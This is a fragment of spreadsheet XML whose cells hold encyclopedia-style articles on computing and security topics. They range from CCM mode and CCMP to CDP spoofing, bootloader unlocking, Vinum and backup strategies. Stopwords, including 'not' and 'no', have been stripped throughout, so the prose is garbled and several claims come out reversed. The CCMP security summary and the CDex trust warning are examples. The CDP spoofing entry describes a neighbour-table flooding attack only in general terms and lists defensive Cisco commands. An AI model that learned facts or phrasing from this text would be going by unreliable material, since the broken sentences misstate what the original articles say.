(microarchitecture); recent formal name virtual-8086 mode extensions, abbreviated (older documentation "virtual 8086 mode enhancements" acronym expansion). some later intel chips also support enhancements address mainly 8086 virtualization overhead, particular focus (virtual) interrupts. before extensions publicly documented documentation, official documentation referred famed appendix omitted public documentation shared selected partners nda. activating done setting number (0x1 value) cr4. because interrupt speed-up enhancements found useful non-vm86 protected tasks, also enabled separately setting number (0x2 value), called (protected mode virtual interrupts). detecting whether processor supports (including pvi) done using cpuid instruction, initial value 0x1, testing value second (bit number value) register, supported processor. linux, latter reported flag /proc/cpuinfo file, "flags" section. virtual 8086 mode, basic idea iopl less pushf/popf/sti/cli/int/iret instructions treat value real 32-bit eflags register value simulated 16-bit flags register (32-bit pushfd/popfd continues fault). cause fault setting simulated directing process pending interrupts. idea affects cli/sti instructions. first generation ryzen cpus found feature broken implementation. second generation ryzen (2000 series) fixed issue. 64-bit support virtual 8086 mode available x86-64 long mode, although still present x86-64 capable processors running legacy mode. intel vt-x brings back ability virtual 8086 mode x86-64 long mode, done transitioning (physical) processor root mode launching logical (virtual) processor running virtual 8086 mode.westmere later intel processors usually start virtual processor directly real mode using "unrestricted guest" feature (which requires extended page tables); method removes need resort nested virtual 8086 mode simply legacy bios booting.amd-v virtual 8086 mode guests, too, also guest "paged real mode" using following steps: create (secure virtual machine) mode guest cr0.pe=0, cr0.pg=1 (that protected mode disabled paging enabled), ordinarily impossible, allowed guests host intercepts page faults. also ia-32 assembly language notes references</t>
  </si>
  <si>
    <t>CCM mode</t>
  </si>
  <si>
    <t>mode (counter cipher block chaining message authentication code; counter cbc-mac) mode operation cryptographic block ciphers. authenticated encryption algorithm designed provide authentication confidentiality. mode defined block ciphers block length bits.the nonce must carefully chosen never used given key. this derivation mode latter effectively stream cipher. encryption authentication name suggests, mode combines well known cbc-mac well known counter mode encryption. these primitives applied "authenticate-then-encrypt" manner, cbc-mac first computed message obtain message encrypted using counter mode. main insight encryption used both, provided counter values used encryption collide (pre-)initialization vector used authentication. proof security exists combination, based security underlying block cipher. proof also applies generalization size block cipher, size cryptographically strong pseudo-random function (since counter mode cbc-mac, block cipher ever used direction). mode designed russ housley, doug whiting niels ferguson. time mode developed, russ housley employed laboratories. minor variation ccm, called ccm*, used zigbee standard. ccm* includes features additionally offers encryption-only capabilities. performance requires block cipher encryption operations block encrypted-and-authenticated message, encryption block associated authenticated data. according crypto++ benchmarks, requires 28.6 cycles byte intel core processor 32-bit mode.notable inefficiencies: "on-line" aead, length message (and associated data) must known advance. construction, length associated data variable-length encoding, shorter machine word size. this cause pessimistic performance associated data long (which uncommon). associated data processed message data, possible pre-calculate state static associated data. patents catalyst development mode submission mode inclusion ieee 802.11i standard. opposition voiced inclusion mode pending patent application algorithm. inclusion patented algorithm meant significant licensing complications implementors standard. while inclusion mode disputed based intellectual property issues, agreed simplification provided authenticated encryption system desirable. therefore, housley, developed mode potential alternative encumbered patents. even though mode less efficient mode, patent free solution preferable complicated patent licensing issues. therefore, mode went become mandatory component ieee 802.11i standard, mode relegated optional component status, eventually removed altogether. mode used ieee 802.11i ccmp, encryption algorithm wpa2), ipsec, 1.2, well bluetooth energy bluetooth 4.0). available 1.3, enabled default openssl. also authenticated encryption mode galois/counter mode stream cipher stream cipher attack ccmp references external links 3610: counter cbc-mac (ccm) 4309: using advanced encryption standard (aes) mode ipsec encapsulating security payload (esp) 6655: aes-ccm cipher suites transport layer security (tls) critique designer ocb)</t>
  </si>
  <si>
    <t>CCMP (cryptography)</t>
  </si>
  <si>
    <t>counter mode cipher block chaining message authentication code protocol (counter mode cbc-mac protocol) mode protocol (ccmp) encryption protocol designed wireless products implements standards ieee 802.11i amendment original ieee 802.11 standard. ccmp enhanced data cryptographic encapsulation mechanism designed data confidentiality based upon counter mode cbc-mac (ccm mode) advanced encryption standard (aes) standard. created address vulnerabilities presented wired equivalent privacy (wep), dated, insecure protocol. technical details ccmp uses combines mode data confidentiality cipher block chaining message authentication code (cbc-mac) authentication integrity. protects integrity mpdu data field selected portions ieee 802.11 mpdu header. ccmp based processing uses 128-bit 128-bit block size. ccmp uses following parameters: indicating octets (eight bytes). indicating length field octets.a ccmp medium access control protocol data unit (mpdu) comprises five sections. first header contains destination source address data packet. second ccmp header composed octets consists packet number (pn), packet number 48-bit number stored across octets. codes first last four octets ccmp header incremented subsequent packet. between codes reserved octet octet. octet contains (bit (bits 6–7), reserved subfield (bits 0–4). ccmp uses values encrypt data unit mic. third section data unit data sent packet. fourth message integrity code (mic) protects integrity authenticity packet. finally, fifth frame check sequence (fcs) used error detection correction. sections data unit encrypted. security ccmp standard encryption protocol wi-fi protected access (wpa2) standard much secure wired equivalent privacy (wep) protocol temporal integrity protocol (tkip) wi-fi protected access (wpa). ccmp provides following security services: data confidentiality; ensures authorized parties access information authentication; provides proof genuineness user access control conjunction layer managementbecause ccmp block cipher mode using 128-bit key, secure attacks steps operation. generic meet-in-the-middle attacks exist used limit theoretical strength 2n/2 (where number bits key) operations needed. known attacks references</t>
  </si>
  <si>
    <t>Vinum volume manager</t>
  </si>
  <si>
    <t>vinum logical volume manager, also called software raid, allowing implementations raid-0, raid-1 raid-5 models, individually combination. original vinum part base distribution freebsd operating system since 3.0, also netbsd 2003-10-10 2006-02-25, well descendants freebsd, including dragonfly bsd; recent versions freebsd, replaced gvinum, first introduced around freebsd vinum source code maintained freebsd dragonfly source trees. vinum supports raid levels jbod. vinum inspired veritas volume manager.: vinum invoked gvinum (geom vinum) freebsd version modern freebsd, considered legacy volume manager; modern alternatives geom zfs. netbsd, removed netbsd lack interest maintenance; raidframe cited providing similar functionality.in dragonfly bsd, dragonfly's hammer filesystem already implements network mirroring, natacontrol utility could used configure nataraid(4), another software raid implementation, originally appeared freebsd ataraid(4), deprecated freebsd removed freebsd 10.0; netbsd's port hat's lvm2 also available base system dragonfly well addition vinum. software raid hardware raid distribution data across multiple disks managed either dedicated hardware software. additionally, hybrid raids partly software- partly hardware-based solutions. with software implementation, operating system manages disks array normal drive controller (ata, sata, scsi, fibre channel, etc.). with present speeds, software raid faster hardware raid. hardware implementation raid requires minimum special-purpose raid controller. desktop system, expansion card, might capability built motherboard. larger raids, controller disks usually housed external multi-bay enclosure. this controller handles management disks, performs parity calculations (needed many raid levels). this option tends provide better performance, makes operating system support easier. hardware implementations also typically support swapping, allowing failed drives replaced system running. rare cases hardware controllers become faulty, result data loss. hybrid raids become popular introduction inexpensive hardware raid controllers. hardware normal disk controller raid features, boot-time application allows users raids controlled bios. when modern operating system used, need specialized raid drivers make array look like single block device. since controllers actually calculations software, hardware, often called "fakeraids". unlike software raid, "fakeraids" typically cannot span multiple controllers. example configuration simple example mirror drive enterprise drive excelsior (raid1): drive enterprise device /dev/da1s1d drive excelsior device /dev/da2s1d volume mirror plex concat length 512m drive enterprise plex concat length 512m drive excelsior also hard drives redundant array independent disks disk array storage area network (san) logical volume management veritas volume manager bioctl softraid openbsd references external links vinum page official freebsd handbook sourceforge page bootstrapping vinum freebsd documentation project vinum performance measurement</t>
  </si>
  <si>
    <t>CD-Cops</t>
  </si>
  <si>
    <t>cd-cops first cd-rom protection uses geometry cd-rom media rather hidden "mark". invented 1996 danish link data security, known cops copylock key-diskette security used 1990s lotus 1-2-3. overview copy (cd-r cd-rom) different geometry, data position measurement needs used copies. geometry known produced, therefore cd-code expressing layout cd-rom must entered first time user runs protected software. using special production process cases cd-code embedded cd-rom. cd-cops popular encyclopaedias/dictionaries business applications used much games. dvd-cops based principles 1998 first dvd-rom protection made. references sources analysis report cdmediaworld article external links cd-cops linkdata.com dvd-cops linkdata.com</t>
  </si>
  <si>
    <t>CDMF</t>
  </si>
  <si>
    <t>cryptography, cdmf (commercial data masking facility) algorithm developed 1992 reduce security strength 56-bit cipher 40-bit encryption, time requirement u.s. restrictions export cryptography. rather separate cipher des, cdmf constitutes generation algorithm, called shortening. cryptographic algorithms supported s-http. algorithm like des, cdmf accepts 64-bit input key, bits used. algorithm consists following steps: clear bits (ignoring bits does). result encryption using 0xc408b0540ba1e0ae. clear bits encrypt result using 0xef2c041ce6382fe6.the resulting 64-bit data used key. step brute force attack needs test possible keys. references d.b. johnson; s.m. matyas; a.v. j.d. wilkins (march 1994). "the commercial data masking facility (cdmf) data privacy algorithm" (pdf). journal research development. ibm. (2): 217–226. doi:10.1147/rd.382.0217. retrieved april 2007. u.s. patent 5,323,464, ibm's patent cdmf iso/iec9979-0005 register entry (pdf), registered october 1994 schneier, bruce (1996). applied cryptography (2nd ed.). john wiley sons. 366. isbn 0-471-11709-9. 2660, defines s-http</t>
  </si>
  <si>
    <t>CDP spoofing</t>
  </si>
  <si>
    <t>computer networking, spoofing technique employed compromise operation network devices cisco discovery protocol (cdp) discovering neighboring devices. spoofing network security threat mitigated taking precautionary measures. history created cisco 1994. original intent make easier find devices network. used cisco routers, switches network equipment advertise software version, capabilities address.the versions cdpv1 cdpv2: cdpv1 could discover basic information networking devices. these devices able receive information networking device directly connected it.cdpv2 includes utilities checking errors made configuring devices (e.g.; configuring mismatched native vlans). usage enabled default cisco routers, switches servers. protocol disabled across network; however, disabled interface encapsulation changed, re-enabled interface. protocol often used network administrators finding discovering devices easier. when devices discovered easier, help certain network problems, device arrangement, network management networking tasks.although beneficial features, attackers accumulate information devices, leaves device's type, address version exposed vulnerable. attackers information mimic devices, steal information create various network problems.popeskic recommends disabling entire device, rather interfaces, fully mitigate threat spoofing attacks cdp. some suggest disabling device necessity device. requirements function packet contains subnetwork access protocol (snap) header. interface must also support snap, work router, well. must device's interfaces directly connected, otherwise, cannot detect send advertisements device. used cisco devices. connection pair consists cisco device, vendor neutral protocol: link layer discovery protocol (lldp). commands although enabled default, disabled, re-enabled globally interfaces) command: (config)# disable globally:(config)# enable certain interface(s):(config-if)# enable disable certain interface(s):(config-if)# enable table, display whether device established connection another device devices:(device name)# show neighbors note: this command show names devices, ports connecting devices, model name/number, features device. show traffic passed devices:(device name)# show traffic these commands help mitigate detect attacks, spoofing. also help discover flaws within system, e.g.; mismatched native vlans, could inhibiting connection devices. works when router running receives packet, begins build table lists neighboring devices. once devices discovered, intermittently send packet updated information other. this packet contains various information interfaces devices types names.these packets sent encrypted, creating messages devices easily read plain-text. spoofing spoofing creation forged packets impersonate devices, either real arbitrary. this attack type denial-of-service (dos) attack used flood connected devices using cdp. attacker exploit functionality sending thousands spoofed packets multicast address 01:00:0c:cc:cc:cc fill neighbor tables devices network cdp. when happens, traffic network dropped device resources necessary route device's command line interface also become unresponsive making difficult disable ongoing attack. some administrators disable cost able benefit cdp. references</t>
  </si>
  <si>
    <t>CDemu</t>
  </si>
  <si>
    <t>cdemu free open-source virtual drive software, designed emulate optical drive optical disc (including cd-roms dvd-roms) linux operating system. june 2019, cdemu available official repositories debian, ubuntu fedora linux release, available official ubuntu copr fedora linux. components cdemu consists kernel module implementing virtual scsi host adapter, libmirage software library interpreting optical disc images, daemon emulates functionality scsi optical drive+disc, textmode clients controlling emulator. software portable operating systems supported glib, exceptions kernel module clients rely d-bus communication. history cdemu originally designed robert penz justus schwartz patch mplayer allowed mounting .cue/.bin files. after patch completed, realized simplicity, wrote module linux kernel. originally, cdemu named virtual name previously trademarked, owners trademark requested name. june, 2007, development cdemu ceased rewrite developed instead. most work done mandeljc. this version cdemu took another approach emulation much possible userspace. june 2008 considered mostly stable. status version 2.0.0 cdemu supports following image formats: .mds .mdx format .dmg .cdr format blindwrite .b5t/.b6t format discjuggler's .cdi format easy creator .cif format roxio winoncd .c2d format error code modeller .ecm container format gburner .gbi format .iso format compressed forms, .cso .isz .nrg format poweriso .daa format .udf format images (.img, .bin, .ccd, .cue, .sub .toc) gzip archivesthe emulator endeavors follow mmc-3 standard scsi optical drives closely possible, ensuring realistic accurate emulation. optical media emulated cdemu mounted within linux. cdemu support subchannels, cd-text, isrc，mcn ecc/edc, dpm/rmps. there also support limited number encrypted compressed image formats. developers working supporting many major formats can, encourage users submit patches end. also alternative linux programs available repositories debian, ubuntu fedora linux: acetoneiso furius mount references external links official website</t>
  </si>
  <si>
    <t>CDex</t>
  </si>
  <si>
    <t>cdex free software package digital audio extraction audio so-called ripper) audio format conversion microsoft windows. converts cdda tracks standard computer sound files, wav, mp3, vorbis. cdex previously released free software terms general public license (gpl); however, although website claims still case, source code released since 2005. originally written albert faber, developed maintained georgy berdyshev. recent versions software compromised security threat. features cdex able convert audio several formats including wav, vorbis, (using lame encoder), vqf, musepack, ape, many others. version 1.70b2 flac encoding native, version 1.51 flac codecs used using external encoder. supports cd-text allow ripped tracks, reduced user effort, names songs, artists albums. also automatically identify (most) inserted audio look metadata means online database (freedb) automatic tagging, naming sorting ripped files. also includes cdparanoia robust reading. cdex considered configurable relatively easy use. history 2000, start beta phase version 1.30, cdex turned free software project (cdexos: cdex open source) hosted sourceforge.net. january 2006, cdex homepage requested project manager developer, implying albert faber abandoned development cdex. june 2006, cdex 1.70 beta released sourceforge.net website (ascribed georgy berdyshev). first official update program almost three years, cdex 1.70 beta following soon june 2006. 2008 berdyshev joined ariane gomes project developers. november 2009 cdex 1.70 beta released. cdex 1.70 final released june 2014 featuring unicode multibyte version. june 2007, release gplv3, license cdex updated. however, last version source code made available 1.70 beta sourceforge project appears shut july 2015, shortly release version 1.79. from version 1.76 installer includes adware opencandy. november 2017 version 1.96 released. clear current code maintainer, contact details provided. four versions released march 2018. default remote server database cdex, freedb, became inaccessible june 2020. gnudb.org site location gnudb.gnudb.org http port using proxy.gnudb.org works replacement inactive default remote server database. potential risk recent reincarnation cdex seen number sponsored programs automatically selected installation little information nature. scan results suggest substantial risk system installed along source code longer publicly accessible, preventing independent code review. this project considered exploited maintainer trusted. this project trusted installed machine. maintainer taken releases pushed showing activity, support links broken, ticketing system exist broken link, contact details method interact developer installer installing adware without notifications. maintainer exploited strong reputation work project turned mechanism profit. updates made application, including installer hidden software installed. later versions apparently also artifacts ends certain tracks ripped program. rolling back earlier version program eliminates issue. references external links official website</t>
  </si>
  <si>
    <t>CECPQ1</t>
  </si>
  <si>
    <t>cryptography, cecpq1 (combined elliptic-curve post-quantum post-quantum key-agreement protocol developed google limited experiment transport layer security (tls) browsers. succeeded cecpq2. details cecpq1 designed test algorithms provide confidentiality even attacker possesses large quantum computer. key-agreement algorithm combines x25519 newhope, ring learning errors primitive. even newhope turn compromised, parallel x25519 key-agreement ensures cecpq1 provides least security existing connections.it available google chrome beta. 2016, experimental chrome ended planned disabled later chrome update.it succeeded cecpq2. also elliptic-curve diffie–hellman (ecdh) anonymous agreement protocol references</t>
  </si>
  <si>
    <t>CGMS-A</t>
  </si>
  <si>
    <t>copy generation management system analog (cgms-a) copy protection mechanism analog television signals. consists waveform inserted non-picture vertical blanking interval (vbi) analogue video signal. compatible recording device (for example, recorder) detects waveform, block restrict recording video content. broadcast flag, designed digital television signals, although concept same. there digital form cgms specified cgms-d required dtcp ("5c") protection standard. history cgms-a existence since 1995, standardized various organizations including eia/cea. used devices pvrs/dvrs, players recorders, d-vhs, blu-ray recorders, well certain television broadcasts. more recent tivo firmware releases comply cgms-a signals. applications implementation cgms-a required certain applications license. d-vhs recorders comply cgms-a signal analog inputs. technology requires minimal signal processing. where source signal analogue (e.g. vhs, analogue broadcast), cgms-a signalling present source. where source signal digital (e.g. dvd, digital broadcast), copy control information (cci) carried metadata digital transport program stream, compliant hardware device (e.g. player) read data, encode analogue video signal generated within device itself. there blanket legal requirement devices record video detect upon cgms-a information. example, dmca "does require manufacturers consumer electronics, telecommunications computing equipment design products affirmatively respond particular technological measure.". standardization cgms-a standardized iec, cea, eia-j etsi follows: standards, cgms-a information many bits information defined. systems (commonly known "ntsc"), system highly extensible, though beyond cgms-a bits, aspect ratio video signal analogue protection system (aps) bits commonly used. signalling typically present every video frame, cea-805-d states "the transmission rate given packet type defined cea-805-d shall least every three frames", meaning theory three frames, different header values used send data defined standard. type signalling bits total; type defined 480i) offers extensibility re-using data bits undefined values four header bits. type signalling (134 bits total) already defines bits carry active format descriptor, colorimetry, redistribution control, pixel-accurate definition location letterbox pillarbox bars image, plus bytes reserved future use. different header values also used extensibility. systems (commonly, though incorrectly known "pal"), bits widely used interpreted cgms-a named such, added existing signalling standard originally created palplus video format (but still common europe standard video) called widescreen signaling. contradicting type standards some references quote eia-j cpr1204-1 authoritative reference cgms-a 480p60 (525p) systems, since first published standard mention cgms-a 480p. this eia-j document define meaning bits, timing analogue video signal. 480p signalling based existing 480i standard double speed clock, iec-61880-2 formalises defining meanings 480i. however, cea-805 re-defines aspect ratio signalling bits. hence 480p type line cgmms-a data generated accordance cea-805 cannot signal aspect ratio video image, incompatible data generated accordance iec-61880-2, longer straight "double speed clock" version 480i standard. cea-805 cgms-a type confusion cea-805 fourth major version (cea-805-d), errata issued least version. cea-805-d recognises that, respect type signalling, earlier versions standard unclear regarding order bits represented analogue video signal used calculation, also bits used calculation. issue requires sink devices perform multiple calculations type signalling, taking account various possible implementations source devices. there confusion surrounding type signalling. signalling cea-608-b specifies meaning 7-bit field placed data lines. bits contain cgms-a values, bits contain analog protection system (aps) value, analog source (asb) specifying signal originates pre-recorded material, bits reserved. cgms-a signalled bits vertical blanking interval (vbi) signal analog television broadcasts according following matrix: *copynomore part original standard. value originally "reserved". removal signal easily stripped normalizing vbi, e.g. using video stabilizer counter side effects macrovision's manipulation vbi. cgms-a data commingled generally near captioning signals, removal cgms-a likely remove captioning well. scheme made robust adding rights assertion mark (ram); present cgms-a not, copying denied, turning scheme permission-based one. encoded using veil technology. also copy generation management system analog (powerpoint) microsoft videoparameters structure windows video connections techdirt: microsoft: it's broadcast flag, it's different flag references</t>
  </si>
  <si>
    <t>CCID (protocol)</t>
  </si>
  <si>
    <t>ccid (chip card interface device) protocol protocol allows smartcard connected computer card reader using standard interface, without need manufacturer smartcards provide reader protocol. this allows smartcard used security token authentication data encryption, used bitlocker. chip card interface devices come variety forms. smallest ccid form standard dongle contain card secure digital card inside dongle. another popular interface smart card reader keyboard, addition standard keyboard, built-in slot accepting smartcard. however, ccid compliant devices accept removable smartcards, example, select yubikey hardware authentication devices support ccid, play role card reader smartcard itself. hardware implementation according ccid specification standards work group, ccid exchanges information host computer using ccid message consists 10-byte header followed message-specific data. standard defines fourteen commands host computer send data status control information messages. every command requires least response message ccid. software driver ccid driver support natively supported microsoft beginning windows 2000. apple included form native ccid support since support evolving alongside common access card personal identity verification specifications federal government. linux unixes, ccid ct-api devices usually accessed user-space drivers, special kernel adaptation required. list ccid providers advanced card systems actividentity baltech bit4id blutronics elyctis gemalto giesecke devrient global jacarta safenet secutech solutions springcard verisign yubico reiner kartenlesegeräte duali references</t>
  </si>
  <si>
    <t>BATON</t>
  </si>
  <si>
    <t>baton type block cipher since least 1995 united states government secure classified information. while baton algorithm secret case algorithms nsa's suite public pkcs#11 standard includes general information used. 320-bit uses 128-bit block modes, also supports 96-bit electronic codebook mode. bits checksum material. supports "shuffle" mode operation, like cipher juniper. bits initialization vector, regardless block size.in response senate question encrypted video links, said baton could used encryption speeds higher possible skipjack. usage baton used variety products standards: apco project (public standard land mobile radio) (algorithm pkcs#11 (public standard encryption tokens) cdsa/cssm (another public standard) haipe-is (nsa's version ipsec) fnbdt (advanced flexible voice security protocol) thales datacryptor 2000 british network-encryption box) secnet-11 crypto-secure 802.11b card, based sierra chip) fortezza plus card product, used ste) safexcel-3340 haipis network-encryption box) numerous embeddable encryption modules: aim, cypris, myk-85, sierra (microchip), etc. also advanced encryption standard references external links pkcs documentation discussion baton quotes baton senate security interview</t>
  </si>
  <si>
    <t>Bootloader unlocking</t>
  </si>
  <si>
    <t>bootloader unlocking process disabling bootloader security makes secure boot possible. make advanced customizations possible, installing custom firmware. smartphones, custom android distribution mobile operating system. some bootloaders locked all, others unlocked using standard command, others need assistant manufacturer. some include unlocking method unlocked software exploit. bootloader unlocking also done mobile forensics purposes, extract digital evidence mobile devices, tools cellebrite ufed. background unlocking bootloader usually voids warranties make device susceptible data theft. chromebooks, enabling developer mode makes system less secure standard laptop running linux. unlocking bootloader lead data loss android chrome devices, data impossible back without root permission. sascha segan pcmag considered locked bootloader mistake qualcomm snapdragon insiders phone, targeted advanced users. platforms android unlocking bootloader typically done process obtain root access. android bootloaders typically proprietary software based qualcomm bootloader little kernel.in context android, also called unlock. bootloaders nexus devices unlocked using fastboot command unlock.when motorola released bootloader unlocking tool droid razr, verizon removed tool models.in 2012, motorola released limited tool unlocking bootloaders. they require accepting terms conditions creating account bootloader unlocked moto g.in 2011, sony ericsson released online bootloader unlocking tool. sony requires imei number filled website. asus transformer prime tf201, asus released special bootloader unlock tool.htc phones additional layer lock called "s-off/s-on". bootloaders unlocked using exploit, using vendor supplied. latter method usually requires wiping data device. addition, manufacturers prohibit unlocking carrier locked phones. samsung's canadian snapdragon phones allow unlocks regardless phone bought carrier not. 2018, developer developers launched service allowed users unlock bootloader nokia smartphone models. similarly, another developer developers launched service allow users unlock bootloaders samsung galaxy samsung galaxy phones.huawei announced plans allow users unlock bootloader mate series, retracted later. huawei stopped providing bootloader unlock codes since 2018. bootloader exploit named checkm30 developed hisilicon based huawei phones.when bootloader samsung galaxy fold unlocked, camera becomes less functional. this restored re-locking bootloader. this issue later fixed samsung. samsung galaxy series, unlocking bootloader effect camera. others microsoft wpinternals tool able unlock bootloaders nokia lumia phones running windows phone, phones like alcatel idol elite version released november 2015. october 2018, tool released open source software main developer rené lergner (also known heathcliff74) stepped down.the slab bootloader used windows could unlocked using vulnerability, silently patched microsoft 2016. uefi secure boot systems generally unlocked. apple boot protection devices processor older bypassed hardware exploit known checkm8, makes possible operating systems including linux.the bootloader based macs unlocked. google equivalent bootloader unlocking called developer mode chromebooks. chromebooks custom bootloaders modified overwritten removing write-protect screw.in 2013, bootloader chromecast hacked using exploit. 2021, hacked newer versions. relocking android, possible relock bootloader again. also rooting (android) odin (firmware flashing software) explanatory notes references external links locking/unlocking bootloader, android open source project</t>
  </si>
  <si>
    <t>Boot image control</t>
  </si>
  <si>
    <t>boot image control strategy common reduce total cost ownership organizations large numbers similar computers used users common needs, e.g. large corporation government agency. this considered part enterprise application integration larger shops term since applications part boot image, modify boot image, desktop windows vista includes tools boot image control, displacing third-party tools. always flexible handling boot drives, simplifying control reducing need move boot images around drives. increasingly, boot image control network operating system function. economics very often large computer vendor required explain response intend simplify purchaser's boot image control problems attendant service costs: total cost ownership correlates strongly total number different images, total number computers, major cost concern. three basic strategies commonly advised: single base boot image type computer organization, customized user central control thin client strategy smallest possible boot image used, typically include full operating system departmental boot image strategy base boot image customized applications group users, but, users ability upgrade alter configurations thin client strategies organizations closely track, control common standards for, acquisition computer hardware, typically practice thin client strategy. which strategy reduce total cost operations depends several factors: whether capabilities full operating system required, thin client whether applications inflexible software licenses must paid used, even installed whether poorly-behaved applications interact badly removable disk limits make easy difficult re-imaging demand more complex departmental boot images while departmental boot image strategy seems flexible, complexity creating managing several large boot images, determining department needs upgrade applications, easily outweigh these. especially users object subvert discipline waiting regular boot turn upgrade machines once. user allowed own, then, discipline soon degrades effectively bunch home computer whose issues really diagnosable comparable other. situation thin clients become practical answer: many organizations thin clients applications require high security, involve unreliable users repurpose older machines continued use. this much simplifies boot image control facilitating centralized management computers, many advantages: since servers manage clients local environment highly restricted (and often stateless), providing protection malware, support costs reduced since application data typically resides thin client entirely rendered), securely stored network drives upon creation since disk, application memory, processors minimal thin client hardware, obsolete slowly cost much less since useful ordinary computers less interest thieveswhile control images simpler, disadvantages. thin clients: require network bandwidth require host computer power must typically served much larger host boxes typically cannot arbitrary windows, linux software perform poorly multimedia applications games advantage many business environmentsmany organizations gain advantages thin clients without disadvantages treating many standard machines terminals, much greater capabilities. computers, demanding applications those. boot turns re-imaging administrators perform regular (often bi-annual) boot turn re-images many older, off-spec machines hardware deployed higher-end use. this procedure called cascading: oldest hardware repurposed simpler software continue less demanding access-controlled applications, subjects much rigorous control minimize number images. total cost operations correlates strongly total number different images, total number computers. minimize number images requires additional discipline: specify computer hardware minimize unneeded machine diversity minimize resultant number boot images. upgrade machine specifications additional cost remain useful longer, reduce incursion off-spec machines later life-cycle, improve standardization, reduce support costs, minimize e-waste longer lifecycles organize network boot images efficiently supported swapped, independent data. data must dependent boot devices networks store data secure servers data recovery literally never required even disaster recovery situation confirm, hardware acceptance testing machine, runs standard boot image machine must considered dead arrival strict installation regime ensure supportable standardized boot images used machines connect network first time nonstandard image detected rejected diagnostics troubleshooting help desk technical support staff employ standardized tests identify source problems: boot, software, hardware ideally, backups hand boot image, even spare identical computers quickly booted boot device question determine hard disk, computer software/image problem. common desktop system recovery tools procedures failed desktop units, typically using backup copies boot image created utilities rapid network recovery procedures replace backup boot image minutes less, considerable cost savings using dvd, floppy disk media require human attention ensure computer accessibility features every departmental boot image require them, thin client hardware software itself, accommodate users manner ubiquitous cost effective. support remote work secure off-site system access procedures standard boot image encourage remote workers identical machines office thin clients exclusively facilitate worker transfer changing boots authorizations instead moving actual computer install thin clients off-spec machines eliminate need special boot images them, subsequent diagnostic problems data risks. open configuration semantic services desktop computing increasingly relying services, making thin client approach viable. departmental boot images remain simply instantiate part semantic service-oriented architecture, especially larger organizations. service component architecture would simplify implementation control mechanisms, especially single application language like java used custom applications enterprise. more importantly, shift software service large vendors means applications tied machines, number variant boot images required (with applications installed) reduced. other open configuration technologies bitfrost, openid even xmpp would also simplify configuration boot images, authentication would longer dealt desktop/laptop device. vendor support large system vendors increasingly provide dvds boot image standard machine shipped customer, usually includes tools diagnose changes machine download drivers.</t>
  </si>
  <si>
    <t>Backup</t>
  </si>
  <si>
    <t>information technology, backup, data backup copy computer data taken stored elsewhere used restore original data loss event. verb form, referring process "back up", whereas noun adjective form "backup". backups used recover data loss data deletion corruption, recover data earlier time. backups provide simple form disaster recovery; however backup systems able reconstitute computer system complex configuration computer cluster, active directory server, database server.a backup system contains least copy data considered worth saving. data storage requirements large. information repository model used provide structure storage. there different types data storage devices used copying backups data already secondary storage onto archive files. there also different ways devices arranged provide geographic dispersion, data security, portability. data selected, extracted, manipulated storage. process include methods dealing live data, including open files, well compression, encryption, de-duplication. additional techniques apply enterprise client-server backup. backup schemes include runs validate reliability data backed there limitations human factors involved backup scheme. storage backup strategy requires information repository, secondary storage space data" aggregates backups data "sources". repository could simple list backup media (dvds, etc.) dates produced, could include computerized index, catalog, relational database. backup data needs stored, requiring backup rotation scheme, system backing data computer media limits number backups different dates retained separately, appropriate re-use data storage media overwriting backups longer needed. scheme determines piece removable storage used backup operation long retained backup data stored 3-2-1 rule backup process. states least copies data, stored different types storage media, copy kept offsite, remote location (this include cloud storage). different media used eliminate data loss similar reasons (for example, optical discs tolerate underwater tapes not, ssds cannot fail head crashes damaged spindle motors since moving parts, unlike hard drives) offsite copy protects fire, theft physical media (such tapes discs) natural disasters like floods earthquakes. disaster protected hard drives like made iosafe alternative offsite copy, limitations like able resist fire limited period time, offsite copy still remains ideal choice. backup methods unstructured unstructured repository simply stack tapes, dvd-rs external hdds minimal information backed when. this method easiest implement, unlikely achieve high level recoverability lacks automation. full only/system imaging repository using backup method contains complete source data copies taken specific points time. copying system images, method frequently used computer technicians record known good configurations. however, imaging generally useful deploying standard configuration many systems rather tool making ongoing backups diverse systems. incremental incremental backup stores data changed since reference point time. duplicate copies unchanged data copied. typically full backup files infrequent intervals, serving reference point incremental repository. subsequently, number incremental backups made successive time periods. restores begin last full backup apply incrementals. some backup systems create synthetic full backup series incrementals, thus providing equivalent frequently full backup. when done modify single archive file, speeds restores recent versions files. near-cdp continuous data protection (cdp) refers backup instantly saves copy every change made data. this allows restoration data point time comprehensive advanced data protection. near-cdp backup applications—often marketed "cdp"—automatically take incremental backups specific interval, example every minutes, hour, hours. they therefore allow restores interval boundary. near-cdp backup applications journaling typically based periodic "snapshots", read-only copies data frozen particular point time. near-cdp (except apple time machine) intent-logs every change host system, often saving byte block-level differences rather file-level differences. this backup method differs simple disk mirroring enables roll-back thus restoration images data. intent-logging allows precautions consistency live data, protecting self-consistent files requiring applications quiesced made ready backup." near-cdp practicable ordinary personal backup applications, opposed true cdp, must conjunction virtual machine equivalent therefore generally used enterprise client-server backups. software create copies individual files written documents, multimedia projects, user preferences, prevent failed write events caused power outages, operating system crashes, exhausted disk space, causing data loss. common implementation appended ".bak" extension file name. reverse incremental reverse incremental backup method stores recent archive file "mirror" source data series differences "mirror" current state previous states. reverse incremental backup method starts non-image full backup. after full backup performed, system periodically synchronizes full backup live copy, storing data necessary reconstruct older versions. this either done using hard links—as apple time machine does, using binary diffs. differential differential backup saves data changed since last full backup. this means maximum backups repository used restore data. however, time last full backup (and thus accumulated changes data) increases, time perform differential backup. restoring entire system requires starting recent full backup applying last differential backup. differential backup copies files created changed since last full backup, regardless whether differential backups made since, whereas incremental backup copies files created changed since recent backup type (full incremental). changes files detected recent date/time last modification file attribute, and/or changes file size. other variations incremental backup include multi-level incrementals block-level incrementals compare parts files instead entire files. storage media regardless repository model used, data copied onto archive file data storage medium. medium used also referred type backup destination. magnetic tape magnetic tape long time commonly used medium bulk data storage, backup, archiving, interchange. previously less expensive option, longer case smaller amounts data. tape sequential access medium, rate continuously writing reading data fast. while tape media cost space, tape drives typically dozens times expensive hard disk drives optical drives. many tape formats proprietary specific certain markets like mainframes particular brand personal computer. 2014 become primary tape technology. remaining viable "super" format 3592 (also referred ts11xx series). oracle storagetek t10000 discontinued 2016. hard disk hard disk storage increased time become progressively cheaper. hard disks usually easy use, widely available, accessed quickly. however, hard disk backups close-tolerance mechanical devices easily damaged tapes, especially transported. mid-2000s, several drive manufacturers began produce portable drives employing ramp loading accelerometer technology (sometimes termed "shock sensor"), 2010 industry average drop tests drives technology showed drives remaining intact working 36-inch non-operating drop onto industrial carpeting. some manufacturers also offer 'ruggedized' portable hard drives, include shock-absorbing case around hard disk, claim range higher drop 